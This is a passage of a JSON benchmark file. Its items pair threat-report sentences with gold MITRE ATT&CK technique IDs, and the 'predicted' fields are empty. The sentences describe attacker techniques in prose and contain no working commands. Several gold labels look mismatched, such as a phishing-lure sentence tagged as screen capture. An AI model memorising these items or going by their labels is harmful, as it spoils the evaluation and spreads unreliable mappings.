+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The results are Gzipped and saved under random file in the temp folder.",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions, and then brute forcing usernames and passwords",
+ "gold": [
+ "T1110"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This version\u00a0injects a malicious module into one of\u00a0Avast's processes, whereas early versions of the campaign detected Avast and quit",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Injects ma32.dll into \u201cwwahost.exe\u201d or \u201caudacity.exe\u201d",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "FakeRun\u2019s PDB string (D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\FakeRun.pdb) indicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this process",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "20 New processes The malicious svchost constantly queries ieframe.dll, as well as IWebBrowser2 Interface using CLSID dc30c1661-cdaf-11D0-8A3E-00c04fc9e26e, both key components to interact with Internet Explorer",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The encoded payload was a Cobalt Strike httpsstager that was injected into the PowerShell process that ran the command",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "After finding the process id, the shellcode uses standard functions to allocate and write memory within Explorer and then uses low-level API RtlCreateUserThread for thread injection.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This suggests that other WMI-based VM detection techniques may also detect certain physical systems if those systems do not support the specific WMI query",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Perhaps they plan to pair this stealer with another dropper that maintains the WMI anti-AV functionality",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "FeedBack.php validates the sender by User-Agent, saves the data in the \u201cRAR\u201d server directory and stores the metadata in the mssql database for later reference",
+ "gold": [
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "On the next step this file is executed by rundll32.exe via the KlpSvc export",
+ "gold": [
+ "T1218.011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "19-1 regsvr32 running the .dlls Fig",
+ "gold": [
+ "T1218.010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Obfuscation While the downloader module is not packed, the backdoor is packed with a modified version of UPX",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This is consistent with most espionage-motivated adversaries, as once the adversary gains access via legitimate credentials, they are able to masquerade as a legitimate user and essentially become an insider threat",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "CTU researchers identified BRONZE UNION actors using a file named ms.exe that was likely a credential-abuse tool from the Kekeo toolset",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Additionally, some of this early activity shares a similarity with current FIN7 operations \u2013 the use of Power Admin PAExec for lateral movement",
+ "gold": [
+ "T1021.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Also, this variant of OopsIE uses the output of the whoami command as the parameter within the URL when communicating with the C2 server, which differs from the previous OopsIE variant that used the hostname and username from the environment variables",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "These strings have the following format:uuid=[Victim ID]#un=[Username]#cn=[Hostname]#on=[OS Version]#lan=[IP Address]#nop=#ver=1.0uuid=[Victim ID]#un=[Username]#An example of the first string may be seen below:uuid=e29ac6c0-7037-11de-816d-806e6f6e696351c5#un=Josh Grunzweig#cn=WIN-LJLV2NKIOKP#on=mav6miv1#lan=192.168.217.141#nop=#ver=1.0It should be noted that the variables used for this string are different from previous versions",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When the malicious ISAPI filter captures a username matching this variable, it knows to handle the incoming HTTP request as a command to the web shell",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Code comparison between the default batch script issued by Poison Frog\u2019s C2 and a batch script received by the Helminth Trojan Webshells The data dump included several different webshells apparently used by OilRig to interact with compromised servers",
+ "gold": [
+ "T1064",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "When, finally, the first stage shellcode receives a special \u201cFF\u201d signal, it then executes the delivered shellcode",
+ "gold": [
+ "T1064",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment \u201cone line shellcode injection with native x86 shellcode\u201d",
+ "gold": [
+ "T1064",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "However, in order to kick off the execution of the malware the attacker uses a batch script which executes the malware, but the batch script does more than simply initiate execution of the malware",
+ "gold": [
+ "T1064",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The full contents of the batch script are given in Appendix C \u2013 a.bat",
+ "gold": [
+ "T1064",
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Can capture all screen (\u201cAllScreen\u201d) or the active window (\u201cActiveWindow\u201d) -ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9] Figure 1: Lure Screenshots The group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It also deletes Windows Event Logs : Application, Security, Setup, System",
+ "gold": [
+ "T1070"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "As mentioned previously, Buckeye also uses a number of hacking tools, including the following: Keylogger: The keylogger is configured using the command line parameters: NetworkService, Replace, Install, Register and Unregister",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Example of decoded keylogger output",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "XAgent C2 Communications The macOS variant of XAgent has ability to receive commands from threat actors via its command and control channel, but is also capable of logging key strokes via its keylogger functionality",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "(Source: SecureWorks) Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure, and all queries contained the HttpClient User-Agent: GET /manager/html/ \u2014 Tomcat web application manager GET /jmx-console/ \u2014 JBoss configuration GET /CFIDE/administrator/login.cfm \u2014 ColdFusion configuration Installation TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 1: Code from 29[.]html scheduling the first task to run a script from pastebin The second task (\u201cMSOFFICEER\u201d) in Figure 2 runs the script contents of a different page of the same blog, blog-page[.]html, every 100 minutes",
+ "gold": [
+ "T1053.005",
+ "T1053"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8] Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions In August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Group123 Links? As we explore the Korean malware landscape, we always have burning questions relating to any possible links with Group123",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It\u2019s important to remember, that while we were using Bitly links to help gauge click location, anyone who clicks these links (including researchers) are also counted",
+ "gold": [
+ "T1598.003"
+ ],
+ "predicted": ""
+ },
+ {
